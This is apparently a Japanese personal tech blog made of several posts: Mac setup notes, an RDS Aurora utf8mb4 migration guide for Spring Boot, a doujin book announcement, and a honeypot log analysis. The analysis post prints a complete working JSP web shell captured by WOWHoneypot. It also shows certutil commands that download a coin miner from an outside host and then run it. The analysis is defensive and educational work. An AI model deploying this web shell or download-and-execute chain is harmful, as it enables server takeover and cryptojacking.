新しい Mac を手に入れたときにやったことをまとめました

dotfiles などで済む分については dotfiles に入れているのですが、それでも手作業でやることって意外とありますね。開発周りでやったことをまとめてみました。

zshをbrewから入れてログインシェルに設定する

bashからzshに移行したときのメモ - Qiita

最近はなんとなく bash より zsh 派です。前職で暇なときにこっそり乗り換えた記憶があります。 .zshrc も dotfiles で管理しなきゃなーと思いながら、なんだかんだで半年くらい経っている気がしますね……。なんとかしなければ。

fzfを入れる(リポジトリをcloneしてinstall叩きました)

fzfを使おう - Qiita

fzf は Ctrl+R のヒストリー検索で使って以降離れられなくなりました。ヒストリー検索以外でも今後は使いこなしていきたいところです。

colorオンでlsした時にディレクトリが青なのが見にくいので、シアンに変更

ls の結果に色をつける - ねもぷらす

タイトルそのままです。これは本来 .zshrc に入れるべきところですね。

markdownをデフォルトでエキスパンドする

vimの折りたたみ設定

vim で markdown を開いたときに、折りたたみが入ってしまうのが嫌だったので、デフォルトでエキスパンドする設定を入れました。これも本来 .vimrc に入れるべきところですね。

変更入るたびに dotifles コミットしてしてないのがいけないんですよね。とりあえず今回の分はちゃんとあとでコミットします。

RDS(Aurora)にあるデータベースの文字コードを、utf8からutf8mb4へ変更したので、そのときに学んだことや手順のメモです。以下の手順をおこないます。

• RDSの設定をutf8mb4にする
• クライアント側(今回はSpring Bootのアプリケーション)の設定を行う

RDSの設定

RDSのパラメータグループの設定を行います。以下の設定を、クラスターのパラメータグループにたいして入れればOK。

character_set_client:utf8mb4
character_set_connection:utf8mb4
character_set_database:utf8mb4
character_set_results:utf8mb4
character_set_server:utf8mb4

検索していると、indexを張ろうとしたときに問題があるからファイルフォーマットをBarracudaにする、など他の設定の情報も出てくるのですが、MySQL5.7.9以降では問題にならないようです(ファイルフォーマットがデフォルトでBarracudaになるため)。以下リンク先のページにわかりやすくまとまっています。

参考

• MySQL(InnoDB) で charset を utf8mb4 にする注意点の現在
  • https://dev.to/seizans/mysqlinnodb--charset--utf8mb4--1451

パラメータグループの設定ができたら、クライアントから確認してみましょう。

mysql> show variables like "chara%";
+--------------------------+-------------------------------------------------+
| Variable_name            | Value                                           |
+--------------------------+-------------------------------------------------+
| character_set_client     | utf8                                            |
| character_set_connection | utf8                                            |
| character_set_database   | utf8mb4                                         |
| character_set_filesystem | binary                                          |
| character_set_results    | utf8                                            |
| character_set_server     | utf8mb4                                         |
| character_set_system     | utf8                                            |
| character_sets_dir       | /xxxxxxx/xxxxxxx/share/charsets/ |
+--------------------------+-------------------------------------------------+
8 rows in set (0.00 sec)

character_set_client, character_set_connection, character_set_results の値はクライアント側の設定によるので、一旦気にしなくて大丈夫です。また、character_set_system は、システムで使用する文字コードで変更はできないため、utf8のままで問題ありません。

クライアント(Spring Bootアプリケーション) の設定

Connector/Jの公式ドキュメントを見ながら進めていきます。

• MySQL :: MySQL Connector/J 5.1 Developer Guide :: 5.6 Using Character Sets and Unicode
  • https://dev.mysql.com/doc/connector-j/5.1/en/connector-j-reference-charsets.html

雑な翻訳ですが、以下のような感じでしょうか……。

1. サーバー設定を character_set_server=utf8mb4 にする
2. characterEncoding と connectionCollation を接続文字列から除外する

これらの手順を行うことで、Connector/JがUTF-8の設定を自動検出して使用できる

また、Connector/J のバージョンによっても挙動が異なる部分があるようなので、念のためドキュメントの続きの部分も確認しておきましょう。

Connector/J 5.1.46 以前のバージョンを使用している場合

utf8mb4を使うには、サーバーは必ず character_set_server=utf8mb4; で設定されていなければいけない その設定がされていなく、characterEncoding に UTF-8 が指定された場合、MySQLの接続には utf8 が設定される(utf8mb3 のエイリアス)

Connector/J 5.1.47 以降のバージョンを使用している場合

characterEncoding に UTF-8 が指定された場合、utf8mb4 を意味する

characterEncodingに同じ値が設定されていても、バージョンにより解釈が異なるのですね。

私が使用していたConnector/Jはバージョン5.1.47以降だったので、設定としては、以下のように入れておけば大丈夫そうでした。

spring.datasource.url=jdbc:mysql://xxxxxx.xxxxxx.ap-northeast-1.rds.amazonaws.com:3306/db_name?characterEncoding=utf8

今回のブログは以上です！細かいところで地味にハマったのでどなたかのお役に立てば幸いです！

参考

• Amazon RDS(MySQL)でutf8mb4を使いたい場合の設定
  • https://qiita.com/msykd/items/f6ef3f7c137c7778fa70

本が出ます！！！

技術書典５向けの新刊（合同誌）を入稿しました！ つつがなく印刷製本が済めば、2018/10/8 の技術書典でかんずさんの初めての本が出ます。表紙と目次はこちらです。

• IT井戸端会議　Vol.1 - Shin・Do・Meeee
  • WebAssemblyを使ってみる
  • 攻撃のしんどみを肌で感じる - ハニーポット入門 -
  • Raspberry Piを用いたChatbot作成
  • プログラマとして生きた私のハッカーへの道

ひとりが1章を担当する形で、4人で1冊を書き上げました。私は「攻撃のしんどみを肌で感じる - ハニーポット入門 -」の章を担当しました。セキュリティを本業としない方向けの、趣味としてのハニーポット運用について描いたつもりです。

表紙絵は @mokimoki14 が描いてくれました。感謝感謝。

ちなみに裏表紙に入れているロゴの漢字は造漢字で、 @mokimoki14 が ｢辛｣と｢新｣の字を掛け合わせて作ってくれました。サークル名がしんどみ（辛み）と、新 Do me（新しいことやろうぜ）のダブルミーニングであることによるものです。

サークル名「Shin・Do・Meeee」のeが4つなのは執筆メンバーが4人だからです。今後、メンバーの増減に応じてeが増えたり減ったりするかは不明です。

ぜひ技術書典５にお越しください！ 私たちのスペースは「か24」です。当日、スペースでお待ちしてます。

techbookfest.org

Java女子としては見逃せない(?!)、jspを利用したWebShell作成の試みをWOWHoneypotで発見しました。

同一IPからの連続したアクセスで、「Webshell作成」「WebShellを利用したコインマイナー設置」「WebShellを利用したコインマイナー実行」と三段階の攻撃の試みとなっていました。

その1 (Webshellの作成)

PUT /indexweb4.jsp/ HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referer: http://xxx.xxx.xxx.xxx:80/indexweb4.jsp/
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Length: 776
Host: xxx.xxx.xxx.xxx

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c)
{
    StringBuilder line = new StringBuilder();
try
{
    Process pro = Runtime.getRuntime().exec(c);
    BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    String temp = null;
    while ((temp = buf.readLine()) != null)
    {
        line.append(temp+"\\n");
    }
    buf.close();
}
catch (Exception e)
{
    line.append(e.getMessage());
}
return line.toString();
}
%>
<%
if("bala123".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))
{
    out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}
else
{
    out.println(":-)");
}
%>

HTTPのPUTメソッドで、jspファイルの設置を試みているようです。

リクエストパラメータとしては pwd cmd を受け取る作りになっており、動作としては大まかには以下のようになります。

• pwd が想定しているもの("bala123")と一致する場合、cmd の内容を画面に表示し、コマンドを実行
• pwd が想定しているもの("bala123")と一致しなければ :-) を画面に表示して終了

:-) を表示して終了って……

余談ですが、Javaで文字列の比較を行うときは、定数を先に持ってくるのがセオリーでしたね。

変数を先にして request.getParameter("pwd").equals("bala123") としてしまうと、リクエストパラメータのpwdがnullの際にNullPointerExceptionが発生してしまいます。

"bala123".equals(request.getParameter("pwd")) とすることで、pwdがnullの場合もNullPointerExceptionを発生させることなく、結果をfalseとして処理できるようになっています。

その2 (WebShellを利用したコインマイナー設置の試み)

GET /indexweb4.jsp?cmd=cmd.exe%20/c%20certutil.exe%20-urlcache%20-split%20-f%20http://3389.space/nw/vm.exe%20c:/windows/inf/sst.exe&pwd=bala123 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://104.197.55.223:80/indexweb4.jsp?cmd=cmd.exe%20/c%20certutil.exe%20-urlcache%20-split%20-f%20http://3389.space/nw/vm.exe%20c:/windows/inf/sst.exe&pwd=bala123
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xxx.xxx.xxx.xxx

「その1」のWebShell作成の試みが成功したという想定で、次なるリクエストを投げてきています。

pwd=bala123 は、「その1」で想定している pwd の値と等しいため、 cmd に記載されている内容が実行されます。 cmd の内容をURLデコードして見てみると以下のようになります。

cmd.exe /c certutil.exe -urlcache -split -f http://3389.space/nw/vm.exe c:/windows/inf/sst.exe

記述から、Windows向けの処理であることが推測できます。

certutil.exe はWindowsで証明機関の構成/管理を行うコマンドなのですが、上記のように -urlcache -split -f オプションを併用することで、インターネット上から任意のデータをダウンロードを行うことが可能となるそうです。

参考 : A Suspicious Use of certutil.exe - SANS Internet Storm Center

「Windowsにもともと入っているツールで、簡単にインターネットからのファイルダウンロードができる」というところで、なかなかギミックが効いていてカッコいいコマンドの使い方だなあと思うわけですが、悪意あるファイルのダウンロードに利用されると怖いですね。

今回は、指定されたURLからvm.exeを取得し、 c:/windows/inf/sst.exeとして保存しています。vm.exe については、VirusTotalで検索したところ、コインマイナーであるらしいとの情報が出てきました。

その3 (WebShellを利用したコインマイナー実行の試み)

GET /indexweb4.jsp?cmd=cmd.exe%20/c%20c:\windows\inf\sst.exe&pwd=bala123 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://104.197.55.223:80/indexweb4.jsp?cmd=cmd.exe%20/c%20c:\windows\inf\sst.exe&pwd=bala123
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xxx.xxx.xxx.xxx

「その2」が成功した想定で、さらに次のリクエストを投げてきています。こちらも想定された pwd の値が送られてきているため、 cmd の内容が実行されることとなります。 cmd をURLデコードした結果が以下です。

/cmd.exe /c c:\windows\inf\sst.exe

もうこれは説明するまでもないのですが、「その2」でダウンロードしたファイルの実行を行っています。WebShellの設置、コインマイナーのダウンロードが済んだので、次はいよいよコインマイナーの実行に入ろうというところですね。

まとめ

順を追ってログを追うことで、WebShellがどのように作成され、どのように利用されようとしているかを知ることができました。

こういった連続したログから、意図やストーリーみたいなものが見える瞬間が、ハニーポット観察の中で一番好きです。笑

参考

• certutil | 日経 xTECH（クロステック）
• certutil | Microsoft Docs
• A Suspicious Use of certutil.exe - SANS Internet Storm Center